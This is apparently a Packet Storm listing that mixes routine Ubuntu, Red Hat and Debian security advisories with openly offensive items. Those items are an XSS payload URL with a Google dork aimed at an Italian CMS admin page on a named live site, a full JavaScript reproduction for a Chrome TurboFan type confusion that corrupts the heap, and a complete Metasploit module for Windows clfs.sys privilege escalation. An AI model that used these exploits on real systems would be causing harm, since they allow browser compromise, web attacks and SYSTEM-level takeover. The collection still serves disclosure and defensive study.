Ubuntu Security Notice 6370-1 - It was discovered that ModSecurity incorrectly handled certain nested JSON objects. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. It was discovered that ModSecurity incorrectly handled certain HTTP multipart requests. A remote attacker could possibly use this issue to bypass ModSecurity restrictions.

==========================================================================  
Ubuntu Security Notice USN-6370-1  
September 14, 2023

modsecurity-apache vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in ModSecurity.

Software Description:  
- modsecurity-apache: Tighten web applications security for Apache

Details:

It was discovered that ModSecurity incorrectly handled certain nested JSON  
objects. An attacker could possibly use this issue to cause a denial  
of service. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS  
and Ubuntu 20.04 LTS. (CVE-2021-42717)

It was discovered that ModSecurity incorrectly handled certain HTTP  
multipart requests. A remote attacker could possibly use this issue  
to bypass ModSecurity restrictions. (CVE-2022-48279)

It was discovered that ModSecurity incorrectly handled certain file  
uploads. A remote attacker could possibly use this issue to cause a  
buffer overflow and a firewall failure. This issue only affected  
Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.  
(CVE-2023-24021)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
   libapache2-mod-security2        2.9.5-1ubuntu0.1~esm1

Ubuntu 20.04 LTS:  
   libapache2-mod-security2        2.9.3-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libapache2-mod-security2        2.9.2-1ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libapache2-mod-security2        2.9.0-1ubuntu0.1~esm1  
   libapache2-modsecurity          2.9.0-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   libapache2-mod-security2        2.7.7-2ubuntu0.1~esm1  
   libapache2-modsecurity          2.7.7-2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6370-1  
   CVE-2021-42717, CVE-2022-48279, CVE-2023-24021

Package Information:  
   https://launchpad.net/ubuntu/+source/modsecurity-apache/2.9.3-1ubuntu0.1

Ubuntu Security Notice USN-6370-1

Ubuntu Security Notice 6369-1 - It was discovered that libwebp incorrectly handled certain malformed images. If a user or automated system were tricked into opening a specially crafted image file, a remote attacker could use this issue to cause libwebp to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6369-1  
September 14, 2023

libwebp vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

libwebp could be made to crash or run programs if it opened a specially  
crafted file.

Software Description:  
- libwebp: Lossy compression of digital photographic images

Details:

It was discovered that libwebp incorrectly handled certain malformed  
images.  If a user or automated system were tricked into opening a  
specially crafted image file, a remote attacker could use this issue to  
cause libwebp to crash, resulting in a denial of service, or possibly  
execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   libwebp7                        1.2.4-0.1ubuntu0.23.04.2  
   libwebpdemux2                   1.2.4-0.1ubuntu0.23.04.2  
   libwebpmux3                     1.2.4-0.1ubuntu0.23.04.2

Ubuntu 22.04 LTS:  
   libwebp7                        1.2.2-2ubuntu0.22.04.2  
   libwebpdemux2                   1.2.2-2ubuntu0.22.04.2  
   libwebpmux3                     1.2.2-2ubuntu0.22.04.2

Ubuntu 20.04 LTS:  
   libwebp6                        0.6.1-2ubuntu0.20.04.3  
   libwebpdemux2                   0.6.1-2ubuntu0.20.04.3  
   libwebpmux3                     0.6.1-2ubuntu0.20.04.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6369-1  
   CVE-2023-4863

Package Information:  
   https://launchpad.net/ubuntu/+source/libwebp/1.2.4-0.1ubuntu0.23.04.2  
   https://launchpad.net/ubuntu/+source/libwebp/1.2.2-2ubuntu0.22.04.2  
   https://launchpad.net/ubuntu/+source/libwebp/0.6.1-2ubuntu0.20.04.3

Ubuntu Security Notice USN-6369-1

Italia Mediasky CMS version 2.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : İtalia Mediasky CMS v2.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.bereewineshop.com/admin/                                                                                |  | # Dork      : Mediasky - Lato Amministrativo                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E[+] http://www.127.0.0.9bereewineshopcom/admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Italia Mediasky CMS 2.0 Cross Site Scripting

Italia Mediasky CMS version 2.0 suffers from a cross site request forgery vulnerability.

Italia Mediasky CMS 2.0 Cross Site Request Forgery

Chrome suffers from a read-only property overwrite in TurboFan.

    Chrome: Read-only property overwrite in TurboFanVULNERABILITY DETAILSWhile collecting information for a property store, TurboFan bails out if the property isn't writable[2]. Unfortunately, the branch condition[1] does not include one of the store modes, namely `kDefine`. This allows an attacker to overwrite arbitrary non-configurable, read-only properties. It takes a few extra steps to convince TurboFan to compile a vulnerable function -- see the reproduction case section.This issue can be abused to trigger a type confusion in `JsonStringifier::Serialize_`. The function assumes that a `JSRawJson` object can only have a string as its `rawJSON` property value, because `JSRawJson::Create` freezes the object[3] before returning it to the user. Therefore, `Serialize_` doesn't perform a type check before casting the result of `GetProperty` to the string type[4]. `AppendString` might then attempt to concatenate the bogus string[5], corrupting the heap.REFERENCEShttps://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/access-info.cc;drc=5992439d25f71ce29efa8db1c699b99e8773d41f;l=708```PropertyAccessInfo AccessInfoFactory::ComputePropertyAccessInfo(    MapRef map, NameRef name, AccessMode access_mode) const {[...]  while (true) {    PropertyDetails details = PropertyDetails::Empty();    InternalIndex index = InternalIndex::NotFound();    if (!TryLoadPropertyDetails(map, holder, name, &index, &details)) {      return Invalid();    }    if (index.is_found()) {      if (access_mode == AccessMode::kStore ||  // *** 1 ***          access_mode == AccessMode::kStoreInLiteral) {        DCHECK(!map.is_dictionary_map());        // Don't bother optimizing stores to read-only properties.        if (details.IsReadOnly()) return Invalid();  // *** 2 ***[...]}```https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-raw-json.cc;drc=93e93056e3849e78a8c77fe6fd0c2a0983a0b3f4;l=17```MaybeHandle<JSRawJson> JSRawJson::Create(Isolate* isolate,                                         Handle<Object> text) {  DCHECK(v8_flags.harmony_json_parse_with_source);  Handle<String> json_string;  ASSIGN_RETURN_ON_EXCEPTION(isolate, json_string,                             Object::ToString(isolate, text), JSRawJson);  Handle<String> flat = String::Flatten(isolate, json_string);  if (String::IsOneByteRepresentationUnderneath(*flat)) {    if (!JsonParser<uint8_t>::CheckRawJson(isolate, flat)) {      DCHECK(isolate->has_pending_exception());      return MaybeHandle<JSRawJson>();    }  } else {    if (!JsonParser<uint16_t>::CheckRawJson(isolate, flat)) {      DCHECK(isolate->has_pending_exception());      return MaybeHandle<JSRawJson>();    }  }  Handle<JSObject> result =      isolate->factory()->NewJSObjectFromMap(isolate->js_raw_json_map());  result->InObjectPropertyAtPut(JSRawJson::kRawJsonInitialIndex, *flat);  JSObject::SetIntegrityLevel(isolate, result, FROZEN, kThrowOnError).Check();  // *** 3 ***  return Handle<JSRawJson>::cast(result);}```https://source.chromium.org/chromium/chromium/src/+/main:v8/src/json/json-stringifier.cc;drc=221294ce14cb14f84afa156f3c590700bc615dc1;l=530```JsonStringifier::Result JsonStringifier::Serialize_(Handle<Object> object,                                                    bool comma,                                                    Handle<Object> key) {[...]  InstanceType instance_type =      HeapObject::cast(*object).map(cage_base).instance_type();  switch (instance_type) {[...]    case JS_RAW_JSON_TYPE:      DCHECK(v8_flags.harmony_json_parse_with_source);      if (deferred_string_key) SerializeDeferredKey(comma, key);      {        Handle<JSRawJson> raw_json_obj = Handle<JSRawJson>::cast(object);        Handle<String> raw_json;        if (raw_json_obj->HasInitialLayout(isolate_)) {          // Fast path: the object returned by JSON.rawJSON has its initial map          // intact.          raw_json = Handle<String>::cast(handle(              raw_json_obj->InObjectPropertyAt(JSRawJson::kRawJsonInitialIndex),              isolate_));        } else {          // Slow path: perform a property get for \"rawJSON\". Because raw JSON          // objects are created frozen, it is still guaranteed that there will          // be a property named \"rawJSON\" that is a String. Their initial maps          // only change due to VM-internal operations like being optimized for          // being used as a prototype.          raw_json = Handle<String>::cast(  // *** 4 ***              JSObject::GetProperty(isolate_, raw_json_obj,                                    isolate_->factory()->raw_json_string())                  .ToHandleChecked());        }        builder_.AppendString(raw_json); // *** 5 ***      }[...]}```VERSIONGoogle Chrome 114.0.5735.90 (Official Build) V8 version 11.6.0REPRODUCTION CASE```const PROP_NAME = \"rawJSON\",      PROP_VALUE = 0x21212121;  // Will be interpreted as a compressed pointer by `Serialize_`.let define_property_holder = {};define_property_holder.for_deprecation = 1;  // See below.function ReturnHolder() { return define_property_holder; };class Trigger extends ReturnHolder {  // Extend a function that returns a value so that it possible                                      // to store on an existing object.  [PROP_NAME] = (     // A keyed class property initializer is translated to a `kDefine` store.    this[PROP_NAME],  // The store operation performed on the target object will always throw in                      // the interpreter, so the object's map won't be added to the feedback slot.                      // Emit a load so that its feedback map can be reused by the store.    PROP_VALUE  )};for (let i = 0; i < 10; ++i)  new Trigger;  // The store operation has to have a non-empty feedback slot. Use a regular object                // with the writable target property for that.define_property_holder.for_deprecation = 1.1;  // Deprecate the map in the feedback vector so that                                               // it's discarded by TurboFan.define_property_holder = JSON.rawJSON(\"1\");    // The special target object.try { new Trigger } catch { }  // Add the target object map to the load operation's feedback slot.%OptimizeFunctionOnNextCall(Trigger);new Trigger;JSON.stringify(define_property_holder);```CREDIT INFORMATIONSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-09-05.Related CVE Numbers: CVE-2023-4352.Found by: glazunov@google.com

Chrome Read-Only Property Overwrite

A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems. This Metasploit module exploit makes use to two different kinds of specially crafted .blf files.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GoodRanking  include Msf::Exploit::Local::WindowsKernel  include Msf::Post::File  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::Windows::Version  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',          'Description' => %q{            A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on            Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.            The clfs.sys driver contains a function CreateLogFile that is used to create            open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which            contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a            .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with            WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.            This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique            mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of            bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe            that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially            crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.            The exploits creates a controlled memory space by first looping over the CreatePipe function to            to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of            pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the            0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.            This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in            depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).          },          'License' => MSF_LICENSE,          'Author' => [            'Ricardo Narvaja',    # Original PoC (@ricnar456)            'Esteban.kazimirow',  # Original PoC (@solidclt)            'jheysel-r7'          # msf module          ],          'Arch' => [ ARCH_X64 ],          'Platform' => 'win',          'SessionTypes' => [ 'meterpreter' ],          'DefaultOptions' => {            'EXITFUNC' => 'thread'          },          'Targets' => [            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]          ],          'References' => [            [ 'CVE', '2023-28252' ],            [ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]          ],          'DisclosureDate' => '2023-04-11',          'DefaultTarget' => 0,          'Privileged' => true,          'Notes' => {            'Stability' => [CRASH_SAFE],            'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed            'SideEffects' => []          },          'Compat' => {            'Meterpreter' => {              'Commands' => %w[                stdapi_railgun_api              ]            }          }        }      )    )  end  def check    unless session.platform == 'windows'      # Non-Windows systems are definitely not affected.      return Exploit::CheckCode::Safe    end    file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'    unless file?(file_path)      return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')    end    version = get_version_info    if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022      return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")    end    CheckCode::Safe  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')    end    encoded_payload = payload.encoded    execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),      [encoded_payload.length].pack('I<') + encoded_payload    )    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  endend

Windows Common Log File System Driver (clfs.sys) Privilege Escalation

Ubuntu Security Notice 6368-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. It was discovered that Thunderbird did not properly manage memory when handling WebP images. If a user were tricked into opening a malicious WebP image file, an attacker could potentially exploit these to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6368-1September 14, 2023thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2023-4573, CVE-2023-4574,CVE-2023-4575, CVE-2023-4581, CVE-2023-4584)It was discovered that Thunderbird did not properly manage memory whenhandling WebP images. If a user were tricked into opening a malicious WebPimage file, an attacker could potentially exploit these to cause a denialof service or execute arbitrary code. (CVE-2023-4863)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:  thunderbird                     1:102.15.1+build1-0ubuntu0.23.04.1Ubuntu 22.04 LTS:  thunderbird                     1:102.15.1+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:102.15.1+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6368-1  CVE-2023-4573, CVE-2023-4574, CVE-2023-4575, CVE-2023-4581,  CVE-2023-4584, CVE-2023-4863Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:102.15.1+build1-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.15.1+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.15.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6368-1

Red Hat Security Advisory 2023-5148-01 - Red Hat Integration Camel for Spring Boot 3.20.2 is now available. The purpose of this text-only errata is to inform you about the security issues fixed. Issues addressed include bypass and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Integration Camel for Spring Boot 3.20.2 release and security update  
Advisory ID:       RHSA-2023:5148-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5148  
Issue date:        2023-09-13  
CVE Names:         CVE-2023-20873 CVE-2023-34455   
=====================================================================

1. Summary:

Red Hat Integration Camel for Spring Boot 3.20.2 release and security  
update is now available.

Red Hat Product Security has rated this update as having an impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat Integration Camel for Spring Boot 3.20.2 is now available. The  
purpose of this text-only errata is to inform you about the security issues  
fixed.

Security Fix(es):

* spring-boot: Security Bypass With Wildcard Pattern Matching on Cloud  
Foundry (CVE-2023-20873)

* snappy-java: Unchecked chunk length leads to DoS (CVE-2023-34455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2215445 - CVE-2023-34455 snappy-java: Unchecked chunk length leads to DoS  
2231491 - CVE-2023-20873 spring-boot: Security Bypass With Wildcard Pattern Matching on Cloud Foundry

5. References:

https://access.redhat.com/security/cve/CVE-2023-20873  
https://access.redhat.com/security/cve/CVE-2023-34455  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2023-Q3

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlAikfAAoJENzjgjWX9erE99YP/i5C3Va6yTCslqiNPOj8cOhy  
OC1tdof6RVbOxWysA+u4mOSHLQGCO3WJC5ujoTjBLwnyiW0jsQNZywc6MxvFZVi2  
cpd6ZUc6GcOEgXppKmB6kOKckTjK9x2J1Pp99sBaUu1JjjsPHKtiIU7UpxDfbj0x  
l8LKCbFnjvzEc9iLiORTMrR0x+Di72v1g+pDppkF6cLPISQjmaoy2fFPGOk+QNir  
OyR6ftdOUwouMpwoeBYA9LNUtj4L4LIwNo7/XUAM37KpgsDjrIugI03BW55WZetu  
U4fJ2iiCnNRNi7RbQgBoBsAk84wDvZ3CUlsObuJzUnbZO8AHwtTKNLDCXBDXV39N  
qDhN6Qsf+ODX4XRy92Q7e734bLyKBCdo0JoOq6b3bVP0AxDNnM+vf+1WAD2dnU0F  
mVEswKVJ3pex7jgw7tsVeGG7QtDLUD3JC1Sg9/wxXZfjmYxr//5e+BPqb0DY3CQ1  
VK+Ctx/ovR0sHqmTUFMTgupaVqn/6h9nl16QUpDBY3BiP6QOcgBIAMdZoWDzkdOv  
Tg/GiEeofpISrxAVtxJXMAcnJA7XmyfaEa6Ks4kqFM5Jd5q+z8tKsePB+SYprL0K  
9DLXWQpud7FydFnjzS2HtE85md/LCxBiuGhX8LTqAd0S/n/snKTU3vf7rbDs0uYq  
+au4fOPXeWAsGf5whih/  
=jfNi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5148-01

Debian Linux Security Advisory 5497-1 - A buffer overflow in parsing WebP images may result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5497-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 13, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libwebpCVE ID         : CVE-2023-4863A buffer overflow in parsing WebP images may result in the execution ofarbitrary code.For the stable distribution (bookworm), this problem has been fixed inversion 1.2.4-0.2+deb12u1.We recommend that you upgrade your libwebp packages.For the detailed security status of libwebp please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libwebpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUCI48ACgkQEMKTtsN8TjZ6xA/+O7pTgHPsA9EqPp7kZAROOB/a7YyjqI3u3Krun6YMhf/QApCxFWWnXOu73MPDOTarFj2AUjhn6IOEIbGbHEfcr4On0BabOGnXbVpdrhwa1WN3OPxj5XChel4bXXu6H07l2mRh6K4O/m7kt630VDYu4j2eC3ZOQXhQ/+arqYAkMJN0uy9yXwSdpxnuJei0FcsTKRDb4g9qye/sHjivB7wMRic9ZLxcSRET2zd/ruUBqk0Z4S9d58qq/XzayYguOuqthelfPA8Yr7AzT/ZIrrbejDQr3h8WAfiC3a/Gx7j1y1Ll5JoOib1/AoB/fpzyboc27BjCnW0BVbCyHXmdyUK739pnqOa8XrtsBqUkEO53JesTmEVEAUlH/YVp/SR3Y7NrrSWYd52LTAkmRIpD+Qnd3cGkc7WIaPwO4nIRLj1YOaOsD5F0N8LxklO1dEoBzuGPoXlkf8FcI+64lhv9LJDcY3QkKxxiqV78B6jibW5rzLi1FFa6Alo8KE+/Wyz20XDXqN04Ni1QNc8TEE2z0Xcp1CoXjQPg0El5zQXNqmBdmBdFPjqGU6ipAnxacZAFXiYr3aGBmgVvSHtE+nPczijtFNB7f2BIS9V11EqRc+lEhzc1LrXgt+QOYW3puZaEtJKU8c7QR+khmY/HM9n5mfNulamvgNicqSKjXE07KhIBI/U==5C/b-----END PGP SIGNATURE-----

Debian Security Advisory 5497-1

Ubuntu Security Notice 6367-1 - It was discovered that Firefox did not properly manage memory when handling WebP images. If a user were tricked into opening a webpage containing malicious WebP image file, an attacker could potentially exploit these to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6367-1September 14, 2023firefox vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Firefox could be made to crash or run programs if it opened a maliciouswebsite.Software Description:- firefox: Mozilla Open Source web browserDetails:It was discovered that Firefox did not properly manage memory when handlingWebP images. If a user were tricked into opening a webpage containingmalicious WebP image file, an attacker could potentially exploit these tocause a denial of service or execute arbitrary code. (CVE-2023-4863)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         117.0.1+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6367-1  CVE-2023-4863Package Information:  https://launchpad.net/ubuntu/+source/firefox/117.0.1+build2-0ubuntu0.20.04.1

Source

Packet Storm